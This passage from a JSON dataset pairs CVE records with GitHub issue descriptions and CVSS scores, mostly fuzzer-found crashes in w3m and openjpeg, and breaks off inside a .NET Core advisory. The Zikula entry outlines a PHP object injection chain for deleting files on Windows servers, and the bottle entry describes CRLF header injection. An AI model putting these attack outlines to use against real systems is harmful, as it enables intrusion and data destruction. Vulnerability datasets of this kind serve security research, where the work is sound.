  4017. "exploitabilityScore": 2.8
  4018. },
  4019. {
  4020. "CVE_ID": "CVE-2016-9432",
  4021. "Issue_Url_old": "https://github.com/tats/w3m/issues/13",
  4022. "Issue_Url_new": "https://github.com/tats/w3m/issues/13",
  4023. "Repo_new": "tats/w3m",
  4024. "Issue_Created_At": "2016-08-16T18:08:59Z",
  4025. "description": "crash due to bcopy with negative size. How to reproduce ERRORTAG crash because bcopy with negative size. this is found by afl fuzz",
  4026. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4027. "severity": "MEDIUM",
  4028. "baseScore": 6.5,
  4029. "impactScore": 3.6,
  4030. "exploitabilityScore": 2.8
  4031. },
  4032. {
  4033. "CVE_ID": "CVE-2016-9433",
  4034. "Issue_Url_old": "https://github.com/tats/w3m/issues/14",
  4035. "Issue_Url_new": "https://github.com/tats/w3m/issues/14",
  4036. "Repo_new": "tats/w3m",
  4037. "Issue_Created_At": "2016-08-16T18:47:09Z",
  4038. "description": "segfault when iso NUMBERTAG parsing. ERRORTAG found by afl fuzz",
  4039. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4040. "severity": "MEDIUM",
  4041. "baseScore": 6.5,
  4042. "impactScore": 3.6,
  4043. "exploitabilityScore": 2.8
  4044. },
  4045. {
  4046. "CVE_ID": "CVE-2016-9434",
  4047. "Issue_Url_old": "https://github.com/tats/w3m/issues/15",
  4048. "Issue_Url_new": "https://github.com/tats/w3m/issues/15",
  4049. "Repo_new": "tats/w3m",
  4050. "Issue_Created_At": "2016-08-16T19:14:06Z",
  4051. "description": "segfault with incorrect form_int fid. ERRORTAG this is found by afl fuzz",
  4052. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4053. "severity": "MEDIUM",
  4054. "baseScore": 6.5,
  4055. "impactScore": 3.6,
  4056. "exploitabilityScore": 2.8
  4057. },
  4058. {
  4059. "CVE_ID": "CVE-2016-9437",
  4060. "Issue_Url_old": "https://github.com/tats/w3m/issues/17",
  4061. "Issue_Url_new": "https://github.com/tats/w3m/issues/17",
  4062. "Repo_new": "tats/w3m",
  4063. "Issue_Created_At": "2016-08-17T09:37:10Z",
  4064. "description": "write access violation with ' APITAG '. CODETAG Writing to rodata section and crash. This is found by afl fuzz",
  4065. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4066. "severity": "MEDIUM",
  4067. "baseScore": 6.5,
  4068. "impactScore": 3.6,
  4069. "exploitabilityScore": 2.8
  4070. },
  4071. {
  4072. "CVE_ID": "CVE-2016-9438",
  4073. "Issue_Url_old": "https://github.com/tats/w3m/issues/18",
  4074. "Issue_Url_new": "https://github.com/tats/w3m/issues/18",
  4075. "Repo_new": "tats/w3m",
  4076. "Issue_Created_At": "2016-08-17T10:38:42Z",
  4077. "description": "Null pointer dereference with input_alt tag. Null pointer dereference ERRORTAG this is found by afl fuzz",
  4078. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4079. "severity": "MEDIUM",
  4080. "baseScore": 6.5,
  4081. "impactScore": 3.6,
  4082. "exploitabilityScore": 2.8
  4083. },
  4084. {
  4085. "CVE_ID": "CVE-2016-9439",
  4086. "Issue_Url_old": "https://github.com/tats/w3m/issues/20",
  4087. "Issue_Url_new": "https://github.com/tats/w3m/issues/20",
  4088. "Repo_new": "tats/w3m",
  4089. "Issue_Created_At": "2016-08-19T15:56:01Z",
  4090. "description": "infinite recursion with nested table and textarea. ERRORTAG I found w3m called APITAG earlier. This is found by afl fuzz",
  4091. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4092. "severity": "MEDIUM",
  4093. "baseScore": 6.5,
  4094. "impactScore": 3.6,
  4095. "exploitabilityScore": 2.8
  4096. },
  4097. {
  4098. "CVE_ID": "CVE-2016-9440",
  4099. "Issue_Url_old": "https://github.com/tats/w3m/issues/22",
  4100. "Issue_Url_new": "https://github.com/tats/w3m/issues/22",
  4101. "Repo_new": "tats/w3m",
  4102. "Issue_Created_At": "2016-08-19T16:58:10Z",
  4103. "description": "segfault due to dereference near null pointer in APITAG Input: CODETAG gdb trace: ERRORTAG This is found by afl fuzz",
  4104. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4105. "severity": "MEDIUM",
  4106. "baseScore": 6.5,
  4107. "impactScore": 3.6,
  4108. "exploitabilityScore": 2.8
  4109. },
  4110. {
  4111. "CVE_ID": "CVE-2016-9441",
  4112. "Issue_Url_old": "https://github.com/tats/w3m/issues/24",
  4113. "Issue_Url_new": "https://github.com/tats/w3m/issues/24",
  4114. "Repo_new": "tats/w3m",
  4115. "Issue_Created_At": "2016-08-20T13:24:56Z",
  4116. "description": "segfault due to dereference near null pointer in do_refill. input CODETAG gdb CODETAG found by afl fuzz",
  4117. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4118. "severity": "MEDIUM",
  4119. "baseScore": 6.5,
  4120. "impactScore": 3.6,
  4121. "exploitabilityScore": 2.8
  4122. },
  4123. {
  4124. "CVE_ID": "CVE-2016-9443",
  4125. "Issue_Url_old": "https://github.com/tats/w3m/issues/28",
  4126. "Issue_Url_new": "https://github.com/tats/w3m/issues/28",
  4127. "Repo_new": "tats/w3m",
  4128. "Issue_Created_At": "2016-10-02T15:20:37Z",
  4129. "description": "Null pointer dereference in APITAG Input file CODETAG gdb log ERRORTAG found by afl fuzz",
  4130. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4131. "severity": "MEDIUM",
  4132. "baseScore": 6.5,
  4133. "impactScore": 3.6,
  4134. "exploitabilityScore": 2.8
  4135. },
  4136. {
  4137. "CVE_ID": "CVE-2016-9479",
  4138. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/33",
  4139. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/33",
  4140. "Repo_new": "b2evolution/b2evolution",
  4141. "Issue_Created_At": "2016-11-17T12:03:32Z",
  4142. "description": "A vulnerability to change any user's password. MENTIONTAG I find a vulnerability in version NUMBERTAG stable, an attacker can exploit this vulnerability to change other user's password. I have send a message to you in b2evolution.net with detail information. I hope this would be helpful to you to fix it.",
  4143. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  4144. "severity": "HIGH",
  4145. "baseScore": 7.5,
  4146. "impactScore": 3.6,
  4147. "exploitabilityScore": 3.9
  4148. },
  4149. {
  4150. "CVE_ID": "CVE-2016-9559",
  4151. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/298",
  4152. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/298",
  4153. "Repo_new": "imagemagick/imagemagick",
  4154. "Issue_Created_At": "2016-11-09T16:36:07Z",
  4155. "description": "null pointer passed as argument NUMBERTAG which is declared to never be null (tiff.c). On NUMBERTAG with the security policy enabled: ERRORTAG Testcase: URLTAG",
  4156. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4157. "severity": "MEDIUM",
  4158. "baseScore": 6.5,
  4159. "impactScore": 3.6,
  4160. "exploitabilityScore": 2.8
  4161. },
  4162. {
  4163. "CVE_ID": "CVE-2016-9572",
  4164. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/863",
  4165. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/863",
  4166. "Repo_new": "uclouvain/openjpeg",
  4167. "Issue_Created_At": "2016-11-02T14:32:30Z",
  4168. "description": "Openjpeg NUMBERTAG APITAG vulnerability due to some logic error. Overview I have found a vulnerability in openjpeg NUMBERTAG an open source JPEG NUMBERTAG codec written in C language) using AFL ( URLTAG The vulnerability exists in code responsible for decoding the input image. The vulnerability is caused by an improper assumption: if the decoding process successfully finishes, buffer of each component corresponding to each channel APITAG Green, Blue, Alpha) has already been allocated and filled with data; however, the assumption is not always valid, i.e. these buffers has not been allocated when the decoding process successfully returns. The vulnerability can be viewed as a logic error. The vulnerability can trigger many different crash points by crafting the APITAG image file and cause Denial of Service due to Null Pointer Reference. It\u2019s probably that the vulnerability can cause crashes of some other type and cause more critical impact by crafting the APITAG Analysis and APITAG The detail analysis and poc file can be found in the attachment. FILETAG Author name: twelveand0 @ VARAS of IIE org: IIE ( FILETAG Notes I have reported this to APITAG Security Team and they suggested me to report it here before assigning cve id.",
  4169. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4170. "severity": "MEDIUM",
  4171. "baseScore": 6.5,
  4172. "impactScore": 3.6,
  4173. "exploitabilityScore": 2.8
  4174. },
  4175. {
  4176. "CVE_ID": "CVE-2016-9573",
  4177. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/862",
  4178. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/862",
  4179. "Repo_new": "uclouvain/openjpeg",
  4180. "Issue_Created_At": "2016-11-02T14:24:56Z",
  4181. "description": "Openjpeg NUMBERTAG Heap Buffer Overflow Vulnerability due to Insufficient check. overview I have found a vulnerability in openjpeg NUMBERTAG an open source JPEG NUMBERTAG codec written in C language) using AFL ( URLTAG The vulnerability is an heap buffer overflow vulnerability, which can cause out of bound read. The vulnerability exists in code responsible for decompressing the input image. The vulnerability is caused by insufficient check: the code have made sure the parameters of RED channel, GREEN channel and BLUE channel are the same, however, does not do it for ALPHA channel, which causes the length of alpha buffer is less than the expected access length. The vulnerability can cause Denial of Service and Information Disclosure and I am not sure whether it can cause RCE. Analysis and APITAG The detail analysis and poc file can be found in the attachment. FILETAG Author name: twelveand0 @ VARAS of IIE org: IIE ( FILETAG Notes I have reported this to APITAG Security Team and they suggested me to report it here before assigning cve id.",
  4182. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  4183. "severity": "HIGH",
  4184. "baseScore": 8.1,
  4185. "impactScore": 5.2,
  4186. "exploitabilityScore": 2.8
  4187. },
  4188. {
  4189. "CVE_ID": "CVE-2016-9580",
  4190. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/871",
  4191. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/871",
  4192. "Repo_new": "uclouvain/openjpeg",
  4193. "Issue_Created_At": "2016-12-07T13:47:43Z",
  4194. "description": "out of bound write issue caused by integer overflow that can occur in function APITAG PATHTAG ).. DESCRIPTION There is an out of bounds write issue caused by an integer overflow that can occur in function APITAG PATHTAG ). Note that the sanitizer report below flags an out-of-bounds READ in convert NUMBERTAG u NUMBERTAG s_C1R, so the access type named in the title should be checked against the trace. VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG fffffff7d NUMBERTAG sp NUMBERTAG fffffff7d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f NUMBERTAG in convert NUMBERTAG u NUMBERTAG s_C1R PATHTAG NUMBERTAG ab in tiftoimage PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG ffff5df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG Author name: chunibalon of VARAS MENTIONTAG email: EMAILTAG",
  4195. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  4196. "severity": "HIGH",
  4197. "baseScore": 8.8,
  4198. "impactScore": 5.9,
  4199. "exploitabilityScore": 2.8
  4200. },
  4201. {
  4202. "CVE_ID": "CVE-2016-9581",
  4203. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/872",
  4204. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/872",
  4205. "Repo_new": "uclouvain/openjpeg",
  4206. "Issue_Created_At": "2016-12-07T13:50:10Z",
  4207. "description": "out of bound write issue can occur in function convert NUMBERTAG s_C1P1 ( PATHTAG ). DESCRIPTION There is an out of bounds write issue that can occur in function convert NUMBERTAG s_C1P1 ( PATHTAG APITAG other convert_ functions will trigger this problem as well). This issue can be triggered by a malformed TIFF file. Note that the sanitizer report below flags an out-of-bounds READ inside __asan_memcpy, so the access type named in the title should be checked against the trace. VERSION OPENJPEG NUMBERTAG Address Sanitizer Output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG ffff6ef NUMBERTAG bp NUMBERTAG fffffff7d NUMBERTAG sp NUMBERTAG fffffff NUMBERTAG d8 READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG ffff6ef NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG d NUMBERTAG in convert NUMBERTAG s_C1P1 PATHTAG NUMBERTAG ce in tiftoimage PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG ffff5df NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG Author name: bobb, chunibalon of VARAS MENTIONTAG email: EMAILTAG",
  4208. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  4209. "severity": "HIGH",
  4210. "baseScore": 8.8,
  4211. "impactScore": 5.9,
  4212. "exploitabilityScore": 2.8
  4213. },
  4214. {
  4215. "CVE_ID": "CVE-2016-9622",
  4216. "Issue_Url_old": "https://github.com/tats/w3m/issues/32",
  4217. "Issue_Url_new": "https://github.com/tats/w3m/issues/32",
  4218. "Repo_new": "tats/w3m",
  4219. "Issue_Created_At": "2016-11-06T15:05:02Z",
  4220. "description": "null pointer dereference in APITAG input CODETAG gdb log ERRORTAG",
  4221. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4222. "severity": "MEDIUM",
  4223. "baseScore": 6.5,
  4224. "impactScore": 3.6,
  4225. "exploitabilityScore": 2.8
  4226. },
  4227. {
  4228. "CVE_ID": "CVE-2016-9623",
  4229. "Issue_Url_old": "https://github.com/tats/w3m/issues/33",
  4230. "Issue_Url_new": "https://github.com/tats/w3m/issues/33",
  4231. "Repo_new": "tats/w3m",
  4232. "Issue_Created_At": "2016-11-06T15:47:23Z",
  4233. "description": "crash after allocating a string of negative size. input CODETAG crash location ERRORTAG With further debugging, I found that the value APITAG comes from the result of APITAG At APITAG line NUMBERTAG of table.c, the result of APITAG APITAG",
  4234. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4235. "severity": "MEDIUM",
  4236. "baseScore": 6.5,
  4237. "impactScore": 3.6,
  4238. "exploitabilityScore": 2.8
  4239. },
  4240. {
  4241. "CVE_ID": "CVE-2016-9624",
  4242. "Issue_Url_old": "https://github.com/tats/w3m/issues/35",
  4243. "Issue_Url_new": "https://github.com/tats/w3m/issues/35",
  4244. "Repo_new": "tats/w3m",
  4245. "Issue_Created_At": "2016-11-07T08:24:22Z",
  4246. "description": "dereference near null pointer in APITAG input CODETAG APITAG ERRORTAG found by afl fuzz",
  4247. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4248. "severity": "MEDIUM",
  4249. "baseScore": 6.5,
  4250. "impactScore": 3.6,
  4251. "exploitabilityScore": 2.8
  4252. },
  4253. {
  4254. "CVE_ID": "CVE-2016-9625",
  4255. "Issue_Url_old": "https://github.com/tats/w3m/issues/36",
  4256. "Issue_Url_new": "https://github.com/tats/w3m/issues/36",
  4257. "Repo_new": "tats/w3m",
  4258. "Issue_Created_At": "2016-11-07T08:54:01Z",
  4259. "description": "APITAG infinite recursion. input CODETAG APITAG CODETAG found by afl fuzz",
  4260. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4261. "severity": "MEDIUM",
  4262. "baseScore": 6.5,
  4263. "impactScore": 3.6,
  4264. "exploitabilityScore": 2.8
  4265. },
  4266. {
  4267. "CVE_ID": "CVE-2016-9626",
  4268. "Issue_Url_old": "https://github.com/tats/w3m/issues/37",
  4269. "Issue_Url_new": "https://github.com/tats/w3m/issues/37",
  4270. "Repo_new": "tats/w3m",
  4271. "Issue_Created_At": "2016-11-07T15:41:45Z",
  4272. "description": "infinite recursion in APITAG CODETAG APITAG CODETAG found by afl fuzz",
  4273. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4274. "severity": "MEDIUM",
  4275. "baseScore": 6.5,
  4276. "impactScore": 3.6,
  4277. "exploitabilityScore": 2.8
  4278. },
  4279. {
  4280. "CVE_ID": "CVE-2016-9627",
  4281. "Issue_Url_old": "https://github.com/tats/w3m/issues/38",
  4282. "Issue_Url_new": "https://github.com/tats/w3m/issues/38",
  4283. "Repo_new": "tats/w3m",
  4284. "Issue_Created_At": "2016-11-13T16:02:08Z",
  4285. "description": "heap buffer overflow and bad pointer deref in APITAG input CODETAG APITAG ERRORTAG symbol is allocated in APITAG . Its size is only NUMBERTAG So APITAG is a heap buffer overflow read.",
  4286. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4287. "severity": "MEDIUM",
  4288. "baseScore": 6.5,
  4289. "impactScore": 3.6,
  4290. "exploitabilityScore": 2.8
  4291. },
  4292. {
  4293. "CVE_ID": "CVE-2016-9628",
  4294. "Issue_Url_old": "https://github.com/tats/w3m/issues/39",
  4295. "Issue_Url_new": "https://github.com/tats/w3m/issues/39",
  4296. "Repo_new": "tats/w3m",
  4297. "Issue_Created_At": "2016-11-13T16:18:19Z",
  4298. "description": "null pointer deref due to bad form id in APITAG input CODETAG APITAG ERRORTAG I found that form is obtained by APITAG earlier CODETAG Although the value of APITAG is validated, APITAG is incorrectly obtained from user input.",
  4299. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4300. "severity": "MEDIUM",
  4301. "baseScore": 6.5,
  4302. "impactScore": 3.6,
  4303. "exploitabilityScore": 2.8
  4304. },
  4305. {
  4306. "CVE_ID": "CVE-2016-9629",
  4307. "Issue_Url_old": "https://github.com/tats/w3m/issues/40",
  4308. "Issue_Url_new": "https://github.com/tats/w3m/issues/40",
  4309. "Repo_new": "tats/w3m",
  4310. "Issue_Created_At": "2016-11-15T06:48:21Z",
  4311. "description": "deref null pointer in APITAG input CODETAG CODETAG found by afl fuzz",
  4312. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4313. "severity": "MEDIUM",
  4314. "baseScore": 6.5,
  4315. "impactScore": 3.6,
  4316. "exploitabilityScore": 2.8
  4317. },
  4318. {
  4319. "CVE_ID": "CVE-2016-9630",
  4320. "Issue_Url_old": "https://github.com/tats/w3m/issues/41",
  4321. "Issue_Url_new": "https://github.com/tats/w3m/issues/41",
  4322. "Repo_new": "tats/w3m",
  4323. "Issue_Created_At": "2016-11-17T05:21:37Z",
  4324. "description": "global buffer overflow in APITAG input CODETAG build with Address sanitizer. the run result: ERRORTAG CODETAG APITAG NUMBERTAG ERRORTAG , but length of APITAG is NUMBERTAG or NUMBERTAG",
  4325. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4326. "severity": "MEDIUM",
  4327. "baseScore": 6.5,
  4328. "impactScore": 3.6,
  4329. "exploitabilityScore": 2.8
  4330. },
  4331. {
  4332. "CVE_ID": "CVE-2016-9631",
  4333. "Issue_Url_old": "https://github.com/tats/w3m/issues/42",
  4334. "Issue_Url_new": "https://github.com/tats/w3m/issues/42",
  4335. "Repo_new": "tats/w3m",
  4336. "Issue_Created_At": "2016-11-17T07:06:48Z",
  4337. "description": "null pointer deref in APITAG input CODETAG APITAG CODETAG",
  4338. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4339. "severity": "MEDIUM",
  4340. "baseScore": 6.5,
  4341. "impactScore": 3.6,
  4342. "exploitabilityScore": 2.8
  4343. },
  4344. {
  4345. "CVE_ID": "CVE-2016-9632",
  4346. "Issue_Url_old": "https://github.com/tats/w3m/issues/43",
  4347. "Issue_Url_new": "https://github.com/tats/w3m/issues/43",
  4348. "Repo_new": "tats/w3m",
  4349. "Issue_Created_At": "2016-11-18T01:53:54Z",
  4350. "description": "global buffer overflow in APITAG CODETAG how to reproduce NUMBERTAG build w3m with APITAG URLTAG ( APITAG NUMBERTAG APITAG Asan output ERRORTAG ERRORTAG CODETAG map is APITAG , which is size NUMBERTAG",
  4351. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4352. "severity": "MEDIUM",
  4353. "baseScore": 6.5,
  4354. "impactScore": 3.6,
  4355. "exploitabilityScore": 2.8
  4356. },
  4357. {
  4358. "CVE_ID": "CVE-2016-9633",
  4359. "Issue_Url_old": "https://github.com/tats/w3m/issues/23",
  4360. "Issue_Url_new": "https://github.com/tats/w3m/issues/23",
  4361. "Repo_new": "tats/w3m",
  4362. "Issue_Created_At": "2016-08-19T17:38:40Z",
  4363. "description": "memory exhausted due to repeatedly appending \" APITAG \". ERRORTAG gdb ERRORTAG Two issues: NUMBERTAG why does w3m repeatedly append APITAG to the buffer; NUMBERTAG newlen integer overflow in Strgrow, leading to allocation of a huge buffer. found by afl fuzz",
  4364. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4365. "severity": "MEDIUM",
  4366. "baseScore": 6.5,
  4367. "impactScore": 3.6,
  4368. "exploitabilityScore": 2.8
  4369. },
  4370. {
  4371. "CVE_ID": "CVE-2016-9751",
  4372. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/559",
  4373. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/559",
  4374. "Repo_new": "piwigo/piwigo",
  4375. "Issue_Created_At": "2016-11-29T13:38:51Z",
  4376. "description": "[security] quick search and criteria display. We need to sanitize search criteria used in quick search before displaying on FILETAG page.",
  4377. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4378. "severity": "MEDIUM",
  4379. "baseScore": 6.1,
  4380. "impactScore": 2.7,
  4381. "exploitabilityScore": 2.8
  4382. },
  4383. {
  4384. "CVE_ID": "CVE-2016-9835",
  4385. "Issue_Url_old": "https://github.com/zikula/core/issues/3237",
  4386. "Issue_Url_new": "https://github.com/zikula/core/issues/3237",
  4387. "Repo_new": "zikula/core",
  4388. "Issue_Created_At": "2016-12-03T03:06:43Z",
  4389. "description": "APITAG file read vulnerability (windows environment). relevant code in APITAG : ERRORTAG On the windows platform we can bypass the regex filter with APITAG APITAG APITAG the result of APITAG is passed into ERRORTAG ; when APITAG is used on user supplied data it often leads to PHP Object Injection. Here we can launch further attacks with APITAG in APITAG . APITAG delete files on the windows server. Add a public func in class APITAG ERRORTAG Serialize an APITAG object and write it to a file: APITAG FILETAG CODETAG Upload APITAG to the APITAG folder on the windows server. Then request APITAG , and your target file will be deleted. ( APITAG in my test).",
  4390. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4391. "severity": "CRITICAL",
  4392. "baseScore": 9.8,
  4393. "impactScore": 5.9,
  4394. "exploitabilityScore": 3.9
  4395. },
  4396. {
  4397. "CVE_ID": "CVE-2016-9933",
  4398. "Issue_Url_old": "https://github.com/libgd/libgd/issues/215",
  4399. "Issue_Url_new": "https://github.com/libgd/libgd/issues/215",
  4400. "Repo_new": "libgd/libgd",
  4401. "Issue_Created_At": "2016-05-25T11:11:05Z",
  4402. "description": "APITAG stack overflow. Invalid color causes stack exhaustion by recursive call to function APITAG when the image used is not truecolor. Source code: URLTAG CODETAG CODETAG Test script: APITAG Expected result: No crash Actual result: ERRORTAG",
  4403. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  4404. "severity": "HIGH",
  4405. "baseScore": 7.5,
  4406. "impactScore": 3.6,
  4407. "exploitabilityScore": 3.9
  4408. },
  4409. {
  4410. "CVE_ID": "CVE-2016-9964",
  4411. "Issue_Url_old": "https://github.com/bottlepy/bottle/issues/913",
  4412. "Issue_Url_new": "https://github.com/bottlepy/bottle/issues/913",
  4413. "Repo_new": "bottlepy/bottle",
  4414. "Issue_Created_At": "2016-12-08T07:29:24Z",
  4415. "description": "APITAG doesn't filter \" \" leads to CRLF attack. Hi, APITAG doesn't filter \" \", which leads to a CRLF injection attack. For example, using APITAG I can set a new cookie on the client side. :P",
  4416. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  4417. "severity": "MEDIUM",
  4418. "baseScore": 6.5,
  4419. "impactScore": 3.6,
  4420. "exploitabilityScore": 2.8
  4421. },
  4422. {
  4423. "CVE_ID": "CVE-2017-0247",
  4424. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/239",
  4425. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/239",
  4426. "Repo_new": "aspnet/announcements",
  4427. "Issue_Created_At": "2017-05-09T17:13:10Z",
  4428. "description": "Microsoft Security Advisory NUMBERTAG ulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege . Microsoft Security Advisory NUMBERTAG ulnerabilities in .NET Core, ASP.NET Core Could Allow Elevation of Privilege Executive Summary Microsoft is releasing this security advisory to provide information about vulnerabilities in public .NET Core and ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications correctly. .NET Core & ASP.NET Core are the next generation of .NET that provide a familiar and modern framework for web and cloud scenarios. These products are actively developed by the .NET and ASP.NET team in collaboration with a community of open source developers, running on Windows, Mac OS X and Linux. When .NET Core was released, the version number was reset to NUMBERTAG to reflect the fact that it is a separate product from its predecessor .NET. Discussion To discuss the ASP.NET Core issues please see URLTAG To discuss the APITAG Core issues please see URLTAG Issue CVEs and Description CVE | Description | CVETAG CVETAG | Security Feature Bypass CVETAG CVETAG | Denial of Service CVETAG CVETAG | Escalation of Privilege CVETAG CVETAG | Spoofing Affected Software The vulnerabilities affect any Microsoft .NET Core project if it uses the following affected package versions. 
Package name | Package versions | Fixed package versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG FILETAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG FILETAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG Advisory FAQ How do I know if I am affected? .NET Core and ASP.NET Core have two types of dependencies: direct and transitive. If your project has a direct or transitive dependency on any of the packages and versions listed above, you are affected. Note: As part of patching ASP.NET Core MVC we update every APITAG package. If, for example, you have a dependency on APITAG you should update to the appropriate version first NUMBERTAG should be updated to NUMBERTAG should be updated to NUMBERTAG and it will also update any other vulnerable APITAG dependency. NET Core Project formats .NET Core has two different project file formats, depending on what software created the project NUMBERTAG APITAG is the format used in .NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG csproj is the format used in .NET Core NUMBERTAG and Microsoft Visual Studio NUMBERTAG You must ensure you follow the correct update instructions for your project type. 
 Direct Dependencies Direct dependencies are dependencies where you specifically add a package to your project. For example, if you add the APITAG package to your project then you have taken a direct dependency on APITAG . Direct dependencies are discoverable by reviewing your APITAG or csproj file. Transitive Dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if you add the APITAG package to your project it depends on the APITAG package (among others). Your project has a direct dependency on APITAG and a transitive dependency on the APITAG package. Transitive dependencies are reviewable in the Visual Studio Solution Explorer window, which supports searching, or by reviewing the APITAG file contained in the root directory of your project for APITAG projects or the APITAG file contained in the obj directory of your project for csproj projects. These files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. How do I fix my affected application? You will need to fix both direct dependencies and review and fix any transitive dependencies. The Affected Packages and Versions table above lists each vulnerable package, the vulnerable versions and the patched versions. Note : If you are using ASP.NET Core MVC in your projects you should first update the APITAG version according to the affected versions table above. If you are currently using version NUMBERTAG or NUMBERTAG you should update your package version to 